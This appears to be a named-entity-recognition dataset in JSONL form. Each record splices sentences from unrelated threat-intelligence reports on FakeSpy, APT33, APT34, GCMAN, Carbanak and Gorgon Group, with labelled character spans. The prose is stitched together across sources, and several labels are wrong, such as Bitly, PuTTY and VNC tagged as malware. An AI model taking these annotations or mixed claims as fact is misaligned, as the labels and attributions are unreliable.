{"text": "Our analysis indicates that the threat actors are no longer limiting their campaigns to East Asian countries , but are targeting additional countries around the world . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies \u2013 Metel and GCMAN \u2013 and the reemergence of the Carbanak group with new targets in its sights .", "spans": [{"start": 206, "end": 211, "label": "Organization"}, {"start": 461, "end": 484, "label": "Organization"}, {"start": 487, "end": 490, "label": "Organization"}, {"start": 500, "end": 513, "label": "Organization"}, {"start": 580, "end": 584, "label": "Organization"}, {"start": 597, "end": 602, "label": "Organization"}, {"start": 607, "end": 612, "label": "Organization"}, {"start": 642, "end": 656, "label": "Organization"}]}
{"text": "THREAT ANALYSIS Infection Vector : Smishing Your Device Thus far , FakeSpy campaigns are characterized by SMS phishing ( a.k.a . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 390, "end": 403, "label": "Organization"}, {"start": 511, "end": 517, "label": "Organization"}]}
{"text": "smishing ) . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous expos\u00e9s of their activity . Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 363, "end": 376, "label": "Organization"}]}
{"text": "These SMS messages masquerade as a message from the local post office and link to the FakeSpy download . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group . In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": [{"start": 86, "end": 93, "label": "Malware"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 289, "end": 311, "label": "Organization"}]}
{"text": "In a previous campaign reported by JPCERT , mobile users were alerted by phishy messages containing \u201c delivery updates \u201d purportedly from Sagawa Express . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": [{"start": 35, "end": 41, "label": "Organization"}, {"start": 138, "end": 152, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 249, "end": 254, "label": "System"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 394, "end": 416, "label": "Organization"}, {"start": 474, "end": 479, "label": "Malware"}, {"start": 480, "end": 487, "label": "Malware"}]}
{"text": "Fake SMS message luring users to enter a fake website , which contains the malicious APK ( JPCERT report ) . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": [{"start": 91, "end": 97, "label": "Organization"}, {"start": 156, "end": 165, "label": "System"}, {"start": 170, "end": 180, "label": "System"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 391, "end": 402, "label": "Organization"}, {"start": 413, "end": 433, "label": "Organization"}]}
{"text": "Clicking the SMS link brings the user to a fake website that prompts them to download and install the FakeSpy APK , which is masquerading as a local postal service app . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": [{"start": 102, "end": 109, "label": "Malware"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}]}
{"text": "Targeting Postal and Transportation Services Companies One of the most significant findings is that new versions of FakeSpy target not only Korean and Japanese speakers , but also almost any postal service company around the world . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": [{"start": 116, "end": 123, "label": "Malware"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 585, "end": 596, "label": "Organization"}, {"start": 651, "end": 656, "label": "Malware"}, {"start": 659, "end": 662, "label": "Malware"}, {"start": 669, "end": 680, "label": "Malware"}]}
{"text": "Example of more recent FakeSpy campaigns targeting France . Symantec\u2019s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}, {"start": 287, "end": 291, "label": "Organization"}]}
{"text": "New FakeSpy campaign applications leveraging fake postal services apps . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 130, "end": 144, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 252, "end": 262, "label": "Organization"}, {"start": 366, "end": 377, "label": "Organization"}, {"start": 444, "end": 448, "label": "Organization"}]}
{"text": "All recent FakeSpy versions contain the same code with minor changes . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . During that time they poked 70 internal hosts , compromised 56 accounts , making their ACT from 139 attack sources ( TOR and compromised home routers ) .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 71, "end": 86, "label": "Organization"}, {"start": 107, "end": 112, "label": "Organization"}]}
{"text": "The FakeSpy malware has been found to masquerade as any of the following companies : United States Postal Service - An independent agency of the executive branch of the United States federal government . FireEye also noted in their 2017 report that the online handle xman_1365_x , \u201d found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 85, "end": 113, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 448, "end": 452, "label": "Organization"}, {"start": 486, "end": 494, "label": "Malware"}, {"start": 524, "end": 533, "label": "Organization"}]}
{"text": "USPS is the most well-known branch of the US government and provides a publicly funded postal service . Recorded Future\u2019s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 104, "end": 121, "label": "Organization"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 370, "end": 392, "label": "Organization"}, {"start": 431, "end": 436, "label": "Malware"}, {"start": 437, "end": 444, "label": "Malware"}]}
{"text": "Royal Mail - British postal service and courier company . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 131, "end": 135, "label": "Organization"}, {"start": 366, "end": 374, "label": "Malware"}, {"start": 405, "end": 426, "label": "Organization"}]}
{"text": "For most of its history it operated as a government department or public corporation . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33\u2019s domain and hosting infrastructure in an effort to identify recent activity . Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": [{"start": 87, "end": 93, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}]}
{"text": "Deutsche Post - Deutsche Post DHL Group , a German multinational package delivery and supply chain management company headquartered in Bonn . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 39, "label": "Organization"}, {"start": 142, "end": 148, "label": "Organization"}, {"start": 204, "end": 209, "label": "Organization"}, {"start": 316, "end": 322, "label": "Organization"}, {"start": 353, "end": 356, "label": "Organization"}, {"start": 361, "end": 367, "label": "Organization"}, {"start": 435, "end": 444, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 507, "end": 519, "label": "Organization"}]}
{"text": "La Poste - La Poste is a public limited postal service company in France . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 75, "end": 80, "label": "Malware"}, {"start": 165, "end": 190, "label": "Malware"}, {"start": 195, "end": 205, "label": "Malware"}, {"start": 208, "end": 227, "label": "Malware"}, {"start": 230, "end": 247, "label": "Malware"}, {"start": 250, "end": 273, "label": "Malware"}, {"start": 313, "end": 331, "label": "Organization"}, {"start": 389, "end": 401, "label": "Organization"}, {"start": 412, "end": 438, "label": "Organization"}]}
{"text": "Japan Post - A private Japanese post , logistics and courier headquartered in Tokyo . Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 102, "end": 117, "label": "Organization"}, {"start": 217, "end": 229, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 382, "end": 408, "label": "Organization"}]}
{"text": "Yamato Transport - One of Japan 's largest door-to-door delivery service companies , also in Tokyo . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 380, "end": 392, "label": "Organization"}, {"start": 403, "end": 429, "label": "Organization"}]}
{"text": "Chunghwa Post - The government-owned corporation Chunghwa is the official postal service of Taiwan . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 49, "end": 57, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 315, "end": 318, "label": "System"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 394, "end": 403, "label": "Organization"}, {"start": 408, "end": 430, "label": "Organization"}]}
{"text": "Swiss Post - The national postal service of Switzerland , a fully state-owned limited company ( AG ) regulated by public law . While we haven\u2019t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 133, "end": 135, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}, {"start": 552, "end": 564, "label": "Organization"}, {"start": 575, "end": 601, "label": "Organization"}]}
{"text": "The fake applications are built using WebView , a popular extension of Android \u2019 s View class that lets the developer show a webpage . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . APT38 's increasingly aggressive targeting against banks .", "spans": [{"start": 38, "end": 45, "label": "System"}, {"start": 71, "end": 78, "label": "System"}, {"start": 169, "end": 179, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 281, "end": 286, "label": "Organization"}]}
{"text": "FakeSpy uses this view to redirect users to the original post office carrier webpage on launch of the application , continuing the deception . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Gorgon Group used common URL shortening services to download payloads .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 241, "end": 251, "label": "System"}, {"start": 320, "end": 332, "label": "Organization"}]}
{"text": "This allows the application to appear legitimate , especially given these applications icons and user interface . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 227, "end": 245, "label": "Organization"}, {"start": 369, "end": 374, "label": "System"}, {"start": 381, "end": 392, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 441, "end": 450, "label": "Organization"}, {"start": 455, "end": 477, "label": "Organization"}]}
{"text": "New FakeSpy applications masquerading as post office apps . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . APT38 has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}]}
{"text": "FAKESPY CODE ANALYSIS Once the user clicks on the malicious link from the SMS message , the app asks them to approve installation from unknown resources . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . On much of the C2 infrastructure we identified several crimeware family samples .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 193, "end": 205, "label": "Organization"}, {"start": 271, "end": 281, "label": "System"}, {"start": 323, "end": 328, "label": "Organization"}, {"start": 346, "end": 348, "label": "System"}]}
{"text": "This configuration can be toggled on by going to \u2018 Settings \u2019 - > \u2018 Security \u2019 - > \u2018 Unknown Resources \u2019 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 317, "label": "Organization"}, {"start": 387, "end": 409, "label": "Organization"}]}
{"text": "PackageInstaller shows the app \u2019 s permission access and asks for the user 's approval , which then installs the application . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . 360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 342, "end": 347, "label": "Organization"}, {"start": 385, "end": 392, "label": "Organization"}, {"start": 405, "end": 408, "label": "Organization"}, {"start": 413, "end": 419, "label": "Organization"}, {"start": 444, "end": 456, "label": "Organization"}, {"start": 457, "end": 464, "label": "Organization"}]}
{"text": "This analysis dissects FakeSpy \u2019 s Chunghwa Post app version , which emerged in April 2020 . On June 19 , 2019 , FireEye\u2019s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 255, "end": 259, "label": "Malware"}, {"start": 268, "end": 273, "label": "Malware"}, {"start": 296, "end": 303, "label": "Malware"}, {"start": 329, "end": 331, "label": "System"}]}
{"text": "During the installation , the malware asks for the following permissions : READ_PHONE_STATE - Allows read-only access to the phone state , including the current cellular network information , the status of any ongoing calls , and a list of any PhoneAccounts registered on the device . A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . it 's not known if the attackers physically reside in Pakistan .", "spans": [{"start": 395, "end": 403, "label": "Malware"}, {"start": 413, "end": 442, "label": "Malware"}, {"start": 445, "end": 454, "label": "Malware"}, {"start": 459, "end": 470, "label": "Malware"}, {"start": 486, "end": 495, "label": "Malware"}, {"start": 545, "end": 554, "label": "Organization"}]}
{"text": "READ_SMS - Allows the application to read text messages . FireEye\u2019s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication .", "spans": [{"start": 58, "end": 67, "label": "Organization"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 197, "end": 217, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 270, "end": 276, "label": "System"}]}
{"text": "RECEIVE_SMS - Allows the application to receive SMS messages . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": [{"start": 73, "end": 80, "label": "Organization"}, {"start": 152, "end": 162, "label": "Malware"}, {"start": 167, "end": 176, "label": "Malware"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 265, "end": 277, "label": "Organization"}]}
{"text": "WRITE_SMS - Allows the application to write to SMS messages stored on the device or SIM card , including y deleting messages . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks .", "spans": [{"start": 132, "end": 136, "label": "System"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 275, "end": 282, "label": "Organization"}, {"start": 394, "end": 406, "label": "Organization"}]}
{"text": "SEND_SMS - Allows the application to send SMS messages . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": [{"start": 57, "end": 67, "label": "Malware"}, {"start": 100, "end": 105, "label": "Malware"}, {"start": 201, "end": 208, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}]}
{"text": "INTERNET - Allows the application to open network sockets . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": [{"start": 60, "end": 67, "label": "Organization"}, {"start": 143, "end": 151, "label": "Malware"}, {"start": 154, "end": 164, "label": "Malware"}, {"start": 171, "end": 180, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 300, "end": 312, "label": "Organization"}, {"start": 323, "end": 344, "label": "Malware"}]}
{"text": "WRITE_EXTERNAL_STORAGE - Allows the application to write to external storage . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 311, "end": 332, "label": "Malware"}]}
{"text": "READ_EXTERNAL_STORAGE - Allows the application to read from external storage . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": [{"start": 156, "end": 165, "label": "Organization"}, {"start": 187, "end": 195, "label": "Organization"}, {"start": 250, "end": 262, "label": "Organization"}, {"start": 281, "end": 286, "label": "Malware"}]}
{"text": "RECEIVE_BOOT_COMPLETED - Allows the application to receive a broadcast after the system finishes booting . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 442, "end": 448, "label": "System"}]}
{"text": "GET_TASKS - Allows the application to get information about current or recently run tasks . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": [{"start": 101, "end": 106, "label": "Organization"}, {"start": 161, "end": 170, "label": "System"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 340, "end": 345, "label": "Malware"}, {"start": 381, "end": 383, "label": "System"}]}
{"text": "( deprecated in API level 21 ) SYSTEM_ALERT_WINDOW - Allows the application to create windows shown on top of all other apps . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 357, "end": 377, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 583, "end": 602, "label": "Organization"}]}
{"text": "WAKE_LOCK - Allows the application to use PowerManager WakeLocks to keep the processor from sleeping or the screen from dimming . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike \u2013 a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors \u2013 which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": [{"start": 132, "end": 140, "label": "Organization"}, {"start": 186, "end": 199, "label": "System"}, {"start": 525, "end": 530, "label": "Malware"}, {"start": 553, "end": 565, "label": "Organization"}]}
{"text": "ACCESS_NETWORK_STATE - Allows the application to access information about networks . However , this action doesn\u2019t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": [{"start": 329, "end": 341, "label": "Organization"}, {"start": 384, "end": 410, "label": "Organization"}]}
{"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - Whitelists the application to allow it to ignore battery optimizations . Bitdefender\u2019s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank\u2019s employees . Starting in mid-February .", "spans": [{"start": 112, "end": 125, "label": "Organization"}, {"start": 268, "end": 274, "label": "Organization"}]}
{"text": "READ_CONTACTS - Allows the application to read the user 's contacts data . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 170, "end": 179, "label": "Organization"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 359, "end": 380, "label": "Malware"}]}
{"text": "FakeSpy package permissions . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . Unit 42 researchers have been tracking an active campaign .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 30, "end": 33, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}]}
{"text": "On opening the app , two pop-up messages appear on screen : Change SMS App : This sets permissions to intercept every SMS received on the device and send a copy of these messages to the C2 server . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 248, "end": 255, "label": "Organization"}, {"start": 447, "end": 453, "label": "System"}, {"start": 459, "end": 483, "label": "Indicator"}, {"start": 495, "end": 508, "label": "Vulnerability"}]}
{"text": "Ignore Battery Optimization : This sets permissions to continue to operate at full capacity while the phone 's screen is turned off and the phone locked . The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": [{"start": 159, "end": 165, "label": "Organization"}, {"start": 279, "end": 298, "label": "System"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 496, "end": 515, "label": "Organization"}]}
{"text": "These requests rely on the end user accepting the permission changes and points to the importance of healthy skepticism when giving applications permissions . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": [{"start": 170, "end": 184, "label": "Organization"}, {"start": 214, "end": 227, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 404, "end": 416, "label": "Organization"}, {"start": 458, "end": 484, "label": "Malware"}, {"start": 489, "end": 504, "label": "Malware"}, {"start": 529, "end": 541, "label": "Organization"}]}
{"text": "FakeSpy Chunghwa Post version installation process and application UI . Bitdefender\u2019s investigation shows the attackers\u2019 main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee\u2019s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 21, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 340, "end": 362, "label": "Organization"}, {"start": 366, "end": 378, "label": "Organization"}, {"start": 441, "end": 453, "label": "Organization"}]}
{"text": "DYNAMIC LIBRARY LOADING Once the application has finished the installation process , the malware starts its real malicious activity . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": [{"start": 152, "end": 174, "label": "System"}, {"start": 235, "end": 249, "label": "Organization"}, {"start": 265, "end": 277, "label": "Organization"}]}
{"text": "The malicious application da.hao.pao.bin ( Chunghwa Post ) loads a library file libmsy.so used to execute the packed mycode.jar file . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": [{"start": 26, "end": 40, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Organization"}, {"start": 80, "end": 89, "label": "Indicator"}, {"start": 117, "end": 132, "label": "Indicator"}, {"start": 210, "end": 223, "label": "Vulnerability"}, {"start": 400, "end": 412, "label": "Organization"}]}
{"text": "The JAR file is the decrypted version of the file tong.luo , which is located in the assets folder . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": [{"start": 50, "end": 58, "label": "Indicator"}, {"start": 319, "end": 333, "label": "Organization"}, {"start": 360, "end": 384, "label": "Organization"}, {"start": 436, "end": 451, "label": "Malware"}]}
